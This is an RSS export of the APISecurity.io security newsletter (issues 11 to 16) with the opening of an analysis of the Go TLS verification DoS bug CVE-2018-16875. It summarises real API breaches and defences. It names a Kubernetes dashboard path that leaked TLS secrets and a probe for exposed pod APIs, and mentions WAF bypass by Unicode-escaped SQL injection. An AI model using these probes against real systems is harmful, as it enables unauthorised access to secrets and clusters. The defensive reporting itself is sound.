<p>Mark O’Neill from <strong>Gartner </strong>gave a talk at the recent Qualys Security Conference. The recording itself is only available to registered attendees, but there is also written a recap: &#8220;<a href="https://businessinsights.bitdefender.com/api-security-essentials">API Security: Enabling Innovation Without Enabling Attacks and Data Breaches</a>&#8220;.</p>
<p><em><strong>Subscribe to this weekly newsletter at </strong></em><a href="https://apisecurity.io/"><em><strong>https://APISecurity.io/</strong></em></a></p>
<p>The post <a href="https://apisecurity.io/issue-16-dhs-dns-hijacking-directive-plus-5-api-security-rules/">Issue 16: DHS DNS hijacking directive, plus 5 API security rules</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 15: Fortnite hack, TLS MITM attacks, SQL injections for NoSQL</title>
		<link>https://apisecurity.io/issue-15-fortnite-hack-tls-mitm-attacks-sql-injections-for-nosql/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 24 Jan 2019 00:00:28 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=5379</guid>

					<description><![CDATA[<p>Vulnerabilities A team from Check Point Research reported a serious vulnerability in Fortnite authentication API: An old unused subdomain had a misconfigured web application firewall (WAF) that relied only on blacklisting. Attackers could perform a SQL injection in the subdomain to plant their XSS script. Fortnite allowed log in with Facebook and Google credentials using [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-15-fortnite-hack-tls-mitm-attacks-sql-injections-for-nosql/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-15-fortnite-hack-tls-mitm-attacks-sql-injections-for-nosql/">Issue 15: Fortnite hack, TLS MITM attacks, SQL injections for NoSQL</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h2>Vulnerabilities</h2>
<p>A team from Check Point Research <a href="https://research.checkpoint.com/hacking-fortnite/">reported a serious vulnerability</a> in <strong>Fortnite</strong> authentication API:</p>
<p>An old unused subdomain had a misconfigured web application firewall (WAF) that relied only on blacklisting. Attackers could perform a SQL injection in the subdomain to plant their XSS script.</p>
<p>Fortnite allowed log in with Facebook and Google credentials using OAuth, and the SSO API did not verify parameters. Attackers could use these glitches to construct a URL that auhtenticated a user and redirected the user to the compromized page. When the user clicked the link on the page, attackers got the user&#8217;s authentication token. This gave them full access to the user profile, including all points, goods, and stored credit cards.</p>
<h2>Best practices</h2>
<p><strong>SQL injections</strong> are relevant in the NoSQL world as well. NoSQL backends, too, need sanitized inputs. Here are SQL injection examples for:</p>
<ul>
<li><a href="https://medium.com/appsecengineer/dynamodb-injection-1db99c2454ac">AWS DynamoDB SQL injection</a> by Abhay Bhargav</li>
<li><a href="https://blog.sqreen.io/mongodb-will-not-prevent-nosql-injections-in-your-node-js-app/">MongoDB SQL injection</a> by Vladimir de Turckheim</li>
</ul>
<p><strong>TLS can be vulnerable to man-in-the-middle (MITM) attacks</strong>. This can happen if attackers compromise DNS or SSL certificates. In <a href="https://blog.approov.io/strengthen-tls-in-react-native-through-certificate-pinning">this blog post</a>, Skip Hovsmith from CriticalBlue demostrates how to overcome this. He employs certificate pinning technique and uses examples in React framework.</p>
<h2>Technology</h2>
<p>Need to debug your TLS communications? cURL, Chrome, and Firefox can export pre-master secrets used to encrypt the messages. You can then import these secrets into Wireshark and see the contents in the clear. For more details, see Peter Wu&#8217;s <a href="https://www.youtube.com/watch?v=bwJEBwgoeBg">recording</a> and <a href="https://sharkfesteurope.wireshark.org/assets/presentations17eu/15.pdf">slides</a> from a SharkFest session.</p>
<h2>Webinars</h2>
<p>On Wednesday February 6, DZone is hosting a webinar with Dmitry Sotnikov from 42Crunch. The topic of the webinar is &#8220;<strong>API Security: Stories from the Trenches, Common Flaws, and Ways to Mitigate</strong>&#8220;.  You can sign up to the webinar <a href="https://register.gotowebinar.com/register/5601777943566846210?source=42Crunch">here</a>.</p>
<h2>Cost of breach</h2>
<p>Radware ran a <a href="https://www.radware.com/ert-report-2018/">survey on companies that experienced cyberattacks</a>. According to the results:</p>
<ul>
<li>These days, a successful cyberattack costs enterprises $1.1 million in direct costs.</li>
<li>If you include indirect costs, on average the sum goes up to $1.67 million (52% higher than a year ago).</li>
<li>37% enterprises reported reputation loss following an attack.</li>
</ul>
<h2>Trends</h2>
<p><a href="https://www.imperva.com/blog/the-state-of-web-application-vulnerabilities-in-2018/">According to Imperva threat research team</a>, 264 new API vulnerabilities were reported in 2018. This is 23% up from the 214 vulnerabilities reported in 2017. Percentage-wise, this is a smaller increase than the 56% in 2017 from 2016.</p>
<p><em><strong>Subscribe to this weekly newsletter at </strong></em><a href="https://APISecurity.io/"><em><strong>https://APISecurity.io/</strong></em></a></p>
<p>The post <a href="https://apisecurity.io/issue-15-fortnite-hack-tls-mitm-attacks-sql-injections-for-nosql/">Issue 15: Fortnite hack, TLS MITM attacks, SQL injections for NoSQL</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 14: Hacked hot tubs, airlines, trading sites; JSON encoding best practices</title>
		<link>https://apisecurity.io/issue-14-hacked-hot-tubs-airlines-trading-sites-json-encoding-best-practices/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 17 Jan 2019 00:00:34 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=5373</guid>

					<description><![CDATA[<p>Vulnerabilities Noam Rotem found a dangerous combination of vulnerabilities in the APIs of Amadeus flight booking system and El Al airline: The Amadeus API allowed for brute force enumeration of booking identifiers, also known as passenger name record (PNR). The El Al API provided both personal and booking details for any PNR. Once attackers knew the [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-14-hacked-hot-tubs-airlines-trading-sites-json-encoding-best-practices/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-14-hacked-hot-tubs-airlines-trading-sites-json-encoding-best-practices/">Issue 14: Hacked hot tubs, airlines, trading sites; JSON encoding best practices</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h2>Vulnerabilities</h2>
<p>Noam Rotem <a href="https://www.safetydetective.com/blog/major-security-breach-discovered-affecting-nearly-half-of-all-airline-travelers-worldwide/">found a dangerous combination of vulnerabilities</a> in the APIs of <strong>Amadeus flight booking system and El Al airline</strong>:</p>
<ul>
<li>The Amadeus API allowed for brute force enumeration of booking identifiers, also known as passenger name record (PNR).</li>
<li>The El Al API provided both personal and booking details for any PNR.</li>
<li>Once attackers knew the PNR and thhe passenger name, they could log in and change the booking.</li>
</ul>
<p><strong>DX:Exchange, </strong>a popular trading site with over 600K users, <a href="https://arstechnica.com/information-technology/2019/01/hot-new-trading-site-leaked-oodles-of-user-data-including-login-tokens/">had vulnerable APIs under the hood</a>. The issues included, for example:</p>
<ul>
<li>Non-expiring unsigned access tokens</li>
<li>JWT tokens leaking other users&#8217; tokens</li>
</ul>
<p>Researchers were able to get other users&#8217; tokens and invoked the APIs on their behalf.</p>
<p><strong>Balboa smart hot tubs&#8217;</strong> APIs<a href="https://www.pentestpartners.com/security-blog/hackers-in-hot-water-pwning-smart-hot-tubs-yes-really/"> are extremely vulnerable</a>:</p>
<ul>
<li>The APIs are &#8220;protected&#8221; with a shared hardcoded password.</li>
<li>The mobile app controlling the hot tub is invoking the hot tub&#8217;s API over the internet.</li>
<li>Each hot tub comes with an unprotected WiFi hotspot.</li>
<li>The APIs use the WiFi hotspot ID as the device identifier.</li>
</ul>
<p>Attackers can use WiFi hotspot directories to locate all Balboa hot tubs. This gives them both the ID and the location of a hot tub. After that, they can invoke the APIs of the hot tub, know when it is in use, and take over control.</p>
<p>To make things worse, the manufacturer is not responding or fixing the product. IoT security as bad as it gets.</p>
<p>A story of how <strong>Shopify found that their Kubernetes deployment was vulnerable</strong>. Shopify used a beta version of Kubernetes API that was susceptible to SSRF attack. <a href="https://www.eweek.com/welcomead?_qstu=%2Fsecurity%2Fhow-shopify-avoided-a-data-breach-thanks-to-a-bug-bounty">Luckily, this got reported in their bug bounty program</a>, so it only cost them $25K in reward money.</p>
<h2>Best Practices</h2>
<p>Does your API&#8217;s <strong>JSON get rendered in XHTML</strong>? If so, make sure to properly escape <code>CDATA</code> by using JSON stringifier. Encode <code>&lt;&gt;&amp;</code> characters as well as non-ASCII chars like line and paragraph separators. Or better yet, avoid inline scripts altogether. See <a href="https://security.stackexchange.com/questions/11091/is-this-json-encoding-vulnerable-to-cdata-injection">this StackOverflow discussion</a>.</p>
<h2>Conferences</h2>
<p><strong>Skip Hovsmith</strong> gave his <a href="https://blog.approov.io/a-tour-of-api-underprotection">&#8220;Tour of API underprotection&#8221; session at OWASP AppSec California</a>. Hovsmith used a scenario of a mobile app company protecting their API from a rogue app. His advice in a nutshell:</p>
<ul>
<li>Authorize applications, not just users.</li>
<li>Remove secrets.</li>
<li>Use shortlived tokens.</li>
</ul>
<h2>Opinions</h2>
<p><strong>Bernard Harguindeguy</strong> from Ping Identity <a href="https://www.programmableweb.com/news/how-does-your-api-security-stand-against-3-most-common-attacks/sponsored-content/2019/01/03">takes a look at various API attacks</a>, such as:</p>
<ul>
<li>Login</li>
<li>DoS and DDoS</li>
<li>Application and Data</li>
</ul>
<p>He argues that in these cases, AI is the solution to consider.</p>
<p><em><strong>Subscribe to this weekly newsletter at </strong></em><a href="https://APISecurity.io/"><em><strong>https://APISecurity.io/</strong></em></a></p>
<p>The post <a href="https://apisecurity.io/issue-14-hacked-hot-tubs-airlines-trading-sites-json-encoding-best-practices/">Issue 14: Hacked hot tubs, airlines, trading sites; JSON encoding best practices</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 13: Microsoft services and Chromecast hacks, the limitations of WAF</title>
		<link>https://apisecurity.io/issue-13-microsoft-services-chromecast-hacks-limitations-waf/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 10 Jan 2019 00:00:32 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=5361</guid>

					<description><![CDATA[<p>Vulnerabilities Another OAuth hack, and another reason why using OAuth for authentication can be dangerous. Researches by SafetyDetective found that Microsoft had 400 million users exposed. Outlook, Store, and other services allowed wildcard *.office.com as a valid wreply URL for tokens from login.live.com. Attackers noticed that and managed to grab the success.office.com domain in Azure. Now, [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-13-microsoft-services-chromecast-hacks-limitations-waf/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-13-microsoft-services-chromecast-hacks-limitations-waf/">Issue 13: Microsoft services and Chromecast hacks, the limitations of WAF</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h4>Vulnerabilities</h4>
<p>Another OAuth hack, and another reason why using OAuth for authentication can be dangerous. <a href="https://www.safetydetective.com/blog/microsoft-outlook/">Researches by SafetyDetective found</a> that <strong>Microsoft</strong> had 400 million users exposed. Outlook, Store, and other services allowed wildcard <code>*.office.com</code> as a valid <code>wreply</code> URL for tokens from <code>login.live.com</code>. Attackers noticed that and managed to grab the <code>success.office.com</code> domain in Azure. Now, the attackers could construct login URLs that, whenever users clicked the URLs, provided the attackers valid tokens they could intercept and use to access Microsoft Outlook and Microsoft Store as those users.</p>
<p>In addition, yet <a href="https://www.bleepingcomputer.com/news/security/hacker-streaming-pewdiepie-videos-on-exposed-chromecast-devices/">another intranet / open ports hack</a>, similar to the printer hack last month. This time, attackers are using the Shodan search engine to locate <strong>Chromecast</strong> devices exposed to the internet by local routers. Once located, attackers can take over the Chromecast devices and stream the videos that they want onto users&#8217; TVs. Again, the reason is that Chromecast APIs were designed with home WiFi network in mind, so it is assumed that whoever gets access to the API must be the device owner. To protect yourself, if you have a Chromecast device at home, make sure you disable UPnP on your home router.</p>
<h4>API implementation hygiene</h4>
<p>Beware of the declared OAuth scopes in your APIs potentially not matching the actual scope that you grant. The OAuth scope of the <strong>Twitter API</strong> that was <em>not</em> supposed to grant access to direct messages <a href="https://www.bleepingcomputer.com/news/security/twitter-fixes-bug-that-gives-unauthorized-access-to-direct-messages/">actually did.</a></p>
<h4>WAF Failures</h4>
<p>&#8220;<strong>Bypassing WAFs</strong> with JSON Unicode Escape Sequences&#8221; by Tyler Rosonke is another example of why Web Application Firewalls (WAF) are not sufficient for API security. Rosonke <a href="https://trustfoundry.net/bypassing-wafs-with-json-unicode-escape-sequences/">used unicode encoding in JSON in API calls</a> to construct SQL injection commands to backends. WAFs were not API-aware and failed to detect and block the attacks.</p>
<h4>Kubernetes</h4>
<p>Kubernetes APIs had a couple new vulnerabilities this week:</p>
<ul>
<li><a href="https://groups.google.com/forum/#!msg/kubernetes-security-announce/0K5Yjy8wMjs/yuZWq-eqAwAJ">CVE-2018-18264</a> exposed TLS secrets through a simple <code>[DASHBOARD_HOST]/api/v1/secret/kube-system/kubernetes-dashboard-certs</code> call in any dashboard deployment v1.10.0 or earlier using a custom domain.</li>
<li>Remember the <a href="https://apisecurity.io/issue-9-patch-kubernetes-and-nuuo-security-cameras-node-js-security-guide-http3/">Kubernetes API Server hack just a month ago</a>? Another one <a href="https://groups.google.com/forum/#!msg/kubernetes-security-announce/tyd-MVR-tY4/tyREP9-qAwAJ">got reported this week</a>. At this point, it is recommended that you run Kubernetes API Server in your nodes network, and put any other sensitive resources in other networks or behind a heavy firewall.</li>
</ul>
<h4>API governance</h4>
<p>It is not all about just API technology. Here are two stories on API data access and ecosystem that rhyme well:</p>
<ul>
<li><strong>Facebook</strong> is under more criticism because it has turned out <a href="https://www.nytimes.com/2018/12/18/technology/facebook-privacy.html">that it has been sharing private user data through APIs</a> with its strategic partners, including Microsoft, Amazon, and Spotify. The API code worked as designed (meaning Facebook was <em>willing</em> to share the data so the access was authorized), but on the governance level, this violated user privacy settings and user expectations.</li>
<li><strong>Telegram</strong> messenger is being pressed to reduce its the openness of its APIs and<a href="https://www.iranhumanrights.org/2018/12/why-did-telegram-warn-users-that-iranian-versions-of-app-telegram-talaeii-and-hotgram-are-unsafe/"> start discriminating or even blocking third-party client apps that are suspected to be controlled by oppressive governments</a> (in this case Iran).</li>
</ul>
<h4>OWASP</h4>
<p>Internet of Things (IoT) APIs are becoming an evermore important part of API security. <strong>OWASP</strong> has updated their <a href="https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project">Top ten threat list for IoT</a>.</p>
<h4>2018 &#8211; year in review</h4>
<p>Looks like the <strong>largest data breach of 2018</strong> <a href="https://i-hls.com/archives/87932">was API-related after all</a>: Aadhar, the unique identity system in India, had unsecured API accessing the database.  As a result, it exposed 1.1 billion records of Indian residents &#8211; more than twice that of the Marriott breach (which was the runner-up and not API-related).</p>
<p><strong>Want this newsletter delivered to your mailbox weekly? Subscribe at <a href="https://APISecurity.io/">APISecurity.io</a>!</strong></p>
<p>The post <a href="https://apisecurity.io/issue-13-microsoft-services-chromecast-hacks-limitations-waf/">Issue 13: Microsoft services and Chromecast hacks, the limitations of WAF</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 12: Car APIs leaking location, breached security cameras, regulation that helps</title>
		<link>https://apisecurity.io/issue-12-car-apis-leaking-location-breached-security-cameras-regulation-helps/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 03 Jan 2019 01:40:16 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=5351</guid>

					<description><![CDATA[<p>Happy New Year to everyone! Here are a few stories that we have collected for you during the holidays. Vulnerabilities We have previously covered NUUO security cameras vulnerabilities, this time critical API flaws have been reported in Guardzilla cameras. Bitdefender Labs reported multiple issues including: Hardcoded credentials for cloud APIs, Sequential IDs used for user-level [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-12-car-apis-leaking-location-breached-security-cameras-regulation-helps/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-12-car-apis-leaking-location-breached-security-cameras-regulation-helps/">Issue 12: Car APIs leaking location, breached security cameras, regulation that helps</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Happy New Year to everyone! Here are a few stories that we have collected for you during the holidays.</p>
<h4>Vulnerabilities</h4>
<p>We have previously covered <a href="https://apisecurity.io/issue-9-patch-kubernetes-and-nuuo-security-cameras-node-js-security-guide-http3/">NUUO security cameras vulnerabilities</a>, this time critical API flaws have been reported in <strong>Guardzilla cameras</strong>. <a href="https://labs.bitdefender.com/2018/12/iot-report-major-flaws-in-guardzilla-cameras-allow-remote-hijack-of-the-security-device/">Bitdefender Labs reported multiple issues</a> including:</p>
<ul>
<li>Hardcoded credentials for cloud APIs,</li>
<li>Sequential IDs used for user-level authentication (so you can iterate over the user IDs and get information on all cameras belonging to each user including credentials for direct camera access),</li>
<li>Out of bound writes that lead to remote code execution.</li>
</ul>
<p>Looks like the company did not get back to the researches in time and vulnerability information got out in the wild.</p>
<h4>Conference Talks</h4>
<p><strong>API Security Workshop slides from APIdays, Paris</strong> <a href="https://www.slideshare.net/42crunch/apidays-paris-security-workshop">have been published</a> by the speaker, Isabelle Mauny from 42Crunch:</p>
<ul>
<li>How OWASP applies to APIs,</li>
<li>Real-life stories of API breaches,</li>
<li>API security categorization,</li>
<li>Input validation and sanitization,</li>
<li>OAuth tips and best practices,</li>
<li>JWT validation,</li>
<li>Locating vulnerabilities.</li>
</ul>
<p>A fascinating <strong>RSA Conference IoT security talk</strong> by Charles Henderson from IBM&#8217;s X-Force Red team <a href="https://www.rsaconference.com/videos/iot-end-of-days">had some fascinating API-related nuggets</a>: in one real-life example, car manufactures tried to improve physical security of their customers by limiting geolocation range of for vehicle API to 1 km. However, they simply trusted their mobile app invoking the API to report the location of the invoker correctly and didn&#8217;t have any additional security on the API side. As result, the attacker could just keep calling the API enumerating locations and quickly covering significant areas.</p>
<h4>Best Practices</h4>
<p>John Hawkins (CTO at Lightwell) <a href="https://info.lightwellinc.com/blog/api-security-more-than-throttling">published an overview</a> of the most <strong>common API security mechanisms</strong> including:</p>
<ul>
<li>access control,</li>
<li>WAF,</li>
<li>rate limiting,</li>
<li>network authentication and encryption,</li>
<li>protection from DDoS / microservice / application level attacks,</li>
<li>API design,</li>
<li>security testing,</li>
<li>monitoring.</li>
</ul>
<h4>Regulation</h4>
<p>Samir Jain &amp; Lisa Ropple <a href="https://hbr.org/2018/12/stopping-data-breaches-will-require-help-from-governments">argue in Harvard Business Review</a> that instead of punishing companies for security breaches, <strong>governments should provide common standards and assistance</strong>. Right now physical and digital world have vastly different expectations. In the physical world, if a bank gets robbed police steps in and goes after the criminals. In the digital world, there is somehow expectation that any company is supposed to be able to withstand any attacks including those from nation states.</p>
<h4>Opinions</h4>
<p><a href="https://www.synopsys.com/blogs/software-security/api-security/">API security write-up</a> by <strong>Taylor Armerding at Synopsys</strong>:</p>
<ul>
<li>Organizations manage on average 363 APIs, 69% of which are public.</li>
<li>These APIs increasingly become the main vector of attack.</li>
<li>The solution is to move API security to design and development phase, and apply existing and new API security technology.</li>
</ul>
<p>The post <a href="https://apisecurity.io/issue-12-car-apis-leaking-location-breached-security-cameras-regulation-helps/">Issue 12: Car APIs leaking location, breached security cameras, regulation that helps</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 11: Mutual TLS authentication in Golang open to DoS, XSS in Google Code-in</title>
		<link>https://apisecurity.io/issue-11-mutual-tls-auth-golang-open-dos-xss-in-google-code-in/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 20 Dec 2018 00:00:07 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=5318</guid>

					<description><![CDATA[<p>As we are wrapping up 2018, you can&#8217;t help looking back at the record number of high profile API breaches that happened this year and wondering what can be expected next year. However, it is not all about the holiday mood: this week was also marked by a security hole in mutual TLS authentication in [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-11-mutual-tls-auth-golang-open-dos-xss-in-google-code-in/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-11-mutual-tls-auth-golang-open-dos-xss-in-google-code-in/">Issue 11: Mutual TLS authentication in Golang open to DoS, XSS in Google Code-in</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>As we are wrapping up 2018, you can&#8217;t help looking back at the record number of high profile API breaches that happened this year and wondering what can be expected next year. However, it is not all about the holiday mood: this week was also marked by a security hole in mutual TLS authentication in the Go language, XSS at Google Code-in, another Facebook glitch, hundreds of vulnerable Kubernetes deployments, and an announcement of the upcoming healthcare API standards in the US.</p>
<h4>Vulnerabilities</h4>
<p>The big one this week is the <strong>mutual TLS authentication issue in the Go language</strong>. <a href="https://apisecurity.io/mutual-tls-authentication-vulnerability-in-go-cve-2018-16875/">The vulnerability that got fixed this week</a> allowed attackers to launch CPU DoS attacks. With Go being one of the most popular programming languages in the microservices and backend implementation world and mutual TLS is one of the most popular security mechanisms,  the impact of the vulnerability is significant.</p>
<p>Does your web application <strong>render JSON API responses in HTML?</strong> If yes, make sure to escape <code>'&lt;/'</code> or attackers can get their scripts planted and perform a cross-site scripting (XSS) attack. Here&#8217;s how <a href="https://blog.thomasorlita.cz/vulns/google-code-in-xss/">Thomas Orlita hacked Google Code-in&#8217;s website</a> where this wasn&#8217;t taken into account.</p>
<p><strong>Facebook</strong> had their fair share of API troubles <a href="https://apisecurity.io/issue-1-apistrat-cors-samsung-google-facebook-gitlab-apple/">earlier this year</a>. This week, they reported a fairly minor <a href="https://developers.facebook.com/blog/post/2018/12/14/notifying-our-developer-ecosystem-about-a-photo-api-bug/">vulnerability in their photo API</a>: The API gave 3rd party developers and their apps access to photos that users had shared in marketplace, stories, or even drafts, not only to the photos the users had shared on their timelines as is normally the case. The issue occurred between Sept 13 and 25, and it was detected by Facebook&#8217;s own team. No actual breach is known to have happened, but the potential impact still affects 6.8 million users ( as even a minor glitch affects millions on Facebook). In total, 1,500 apps from 876 developers could potentially have  made use of the issue.</p>
<h4>Unprotected APIs</h4>
<p>We talked about unprotected Docker deployments <a href="https://apisecurity.io/issue-10-unprotected-docker-ethereum-apis-mcaffee-2019-forecast/">just last week</a>. Guess what, lots of <strong>Kubernetes</strong> clusters also end up with APIs publicly exposed on the internet. Folks at BinaryEdge <a href="https://blog.binaryedge.io/2018/12/06/kubernetes-being-hijacked-worldwide/">located many of them</a> by testing <code>IP-ADDRESS:PORT/api/v1/pods</code> for various servers. Plenty of the clusters seem to have been already hijacked by cryptominers.</p>
<h4>Opinions</h4>
<p><a href="https://www.informationsecuritybuzz.com/articles/businesses-brace-for-2019s/">Tristan Liverpool</a>, Systems Engineering Director at F5, sees API Security as one of the <strong>challenges for businesses in 2019</strong>.</p>
<p>The end of the year articles are starting to pop up. In Business Insider, Paige Leskin summarizes the <strong>21 biggest data breaches of 2018</strong>. Lots of them are API-related. <a href="https://www.businessinsider.com/data-hacks-breaches-biggest-of-2018-2018-12">The list</a> obviously isn&#8217;t exhaustive (for example, Panera and a few others <a href="https://apisecurity.io/">that we have covered this year</a> are missing) but it shows the trend and the scale of the issue!</p>
<h4>Regulations</h4>
<p><a href="https://www.modernhealthcare.com/article/20181211/NEWS/181219985">According to Donald Rucker</a>, the US Office of the National Coordinator for Health IT will soon release <strong>new requirements on standard open API for patient data access</strong>. The goal is to ensure security yet enable developing mobile and other healthcare applications that could work across all healthcare providers.</p>
<p>&nbsp;</p>
<p>This is our last issue of the newsletter in 2018. We are taking a quick holiday break next week and will resume the newsletter in January.</p>
<p>The post <a href="https://apisecurity.io/issue-11-mutual-tls-auth-golang-open-dos-xss-in-google-code-in/">Issue 11: Mutual TLS authentication in Golang open to DoS, XSS in Google Code-in</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Understanding Golang TLS mutual authentication DoS &#8211; CVE-2018-16875</title>
		<link>https://apisecurity.io/mutual-tls-authentication-vulnerability-in-go-cve-2018-16875/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 19 Dec 2018 17:41:35 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=5309</guid>

					<description><![CDATA[<p>TL; DR; If your source code is written in Go and it uses one-way or mutual TLS authentication, you are vulnerable to CPU denial of service (DoS) attacks. The attacker can formulate inputs in a way that makes the verification algorithm in Go&#8217;s crypto/x509 standard library hog all available CPU resources as it tries to verify [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/mutual-tls-authentication-vulnerability-in-go-cve-2018-16875/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/mutual-tls-authentication-vulnerability-in-go-cve-2018-16875/">Understanding Golang TLS mutual authentication DoS &#8211; CVE-2018-16875</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><strong>TL; DR;</strong> If your source code is written in Go and it uses one-way or mutual TLS authentication, you are vulnerable to CPU denial of service (DoS) attacks. The attacker can formulate inputs in a way that makes the verification algorithm in Go&#8217;s <a href="https://golang.org/pkg/crypto/x509/">crypto/x509</a> standard library hog all available CPU resources as it tries to verify the TLS certificate chain the client has provided.</p>
<p>To protect your services, <a href="https://golang.org/dl/">upgrade</a> immediately to Go v1.10.6 or later, or v1.11.3 or later.</p>
<h4>Why we were interested</h4>
<p>The backend of the <span class="42cProductName">API Security</span> platform by 42Crunch has been implemented using a microservices architecture, with the microservices written in Go. The microservices communicate with each other over gRPC and have a REST API gateway for external invocations. To ensure security, we follow the &#8220;TLS everywhere&#8221; mantra, extensively relying on the mutual TLS authentication.</p>
<p>Go provides native SSL/TLS support in its standard library, as well as an extensive set of  x509 and TLS primitives for manipulating connections, verifications, authentication, certificates, and so forth. This native support avoids external dependencies and reduces the risks by using a standard vetted and maintained TLS implementation.</p>
<p>It naturally follows that 42Crunch could potentially be affected, was curious about this TLS vulnerability and had to understand it to ensure the security of the 42Crunch platform.</p>
<p>The following analysis and details on this CVE are provided by the <a href="https://42crunch.com/">42Crunch</a> security team.</p>
<h4>Problem</h4>
<p>The DoS issue in TLS chain validation was originally found and reported by Netflix, <a href="https://github.com/golang/go/issues/29233">as described in Golang&#8217;s issue tracker</a>:</p>
<blockquote><p>&#8220;<em>Package crypto/x509 parses and validates X.509-encoded keys and certificates. It&#8217;s supposed to handle certificate chains provided by an attacker with reasonable resource use.</em></p>
<p><em>The crypto/x509 package does not limit the amount of work performed for each chain verification, which might allow attackers to craft pathological inputs leading to a CPU denial of service.  Go TLS servers accepting client certificates and TLS clients verifying certificates are affected.</em>&#8220;</p></blockquote>
<p>The issue lies along the call path <a href="https://golang.org/pkg/crypto/x509/#Certificate.Verify">crypto/x509 Certificate.Verify()</a> function, which is responsible for authenticating and verifying certificates.</p>
<h4>Description</h4>
<p>To simplify and stay concise, we explain only an example where a TLS client connects to a TLS server verifying the client certificate.</p>
<p>A TLS server is listening to port <code>8080</code> for TLS clients and verifying client certificates against one trusted certificate authority (CA):</p>
<pre class="line-numbers" data-start="36"><code class="language-go">caPool := x509.NewCertPool()
ok := caPool.AppendCertsFromPEM(caCert)
if !ok {
        panic(errors.New("could not add to CA pool"))
}

tlsConfig := &amp;tls.Config{
        ClientCAs:  caPool,
        ClientAuth: tls.RequireAndVerifyClientCert,
}

//tlsConfig.BuildNameToCertificate()
server := &amp;http.Server{
        Addr:      ":8080",
        TLSConfig: tlsConfig,
}

server.ListenAndServeTLS(certWeb, keyWeb)</code></pre>
<p>In a standard TLS verification scenario, the TLS client connects to the TLS server on port <code>8080</code> and provides its &#8220;trust chain&#8221; that includes the client certificate, the root CA certificate, and all the intermediate CA certificates. The TLS server handles the TLS handshake and to verify the client certificate, checks if the client is trusted (the client certificate is signed by a CA the server trusts). The following diagram shows a simplified flow how the TLS handshake normally goes:</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5326 size-full" src="https://apisecurity.io/wp-content/uploads/2018/12/CVE-2018-16875-Figure-1-Normal.png" alt="Mutual SSL/TLS authentication between microservices" width="960" height="720" /></p>
<p>Following through the Go&#8217;s <code>crypto/x509</code> library, you end up in <code>x509/tls/handshake_server.go:doFullHandshake()</code> :</p>
<pre class="line-numbers" data-start="459"><code class="language-go">...
if c.config.ClientAuth &gt;= RequestClientCert {
        if certMsg, ok = msg.(*certificateMsg); !ok {
                c.sendAlert(alertUnexpectedMessage)
                return unexpectedMessageError(certMsg, msg)
        }
        hs.finishedHash.Write(certMsg.marshal())

        if len(certMsg.certificates) == 0 {
                // The client didn't actually send a certificate
                switch c.config.ClientAuth {
                case RequireAnyClientCert, RequireAndVerifyClientCert:
                        c.sendAlert(alertBadCertificate)
                        return errors.New("tls: client didn't provide a certificate")
                }
        }

        pub, err = hs.processCertsFromClient(certMsg.certificates)
        if err != nil {
                return err
        }

        msg, err = c.readHandshake()
        if err != nil {
                return err
        }
}
...</code></pre>
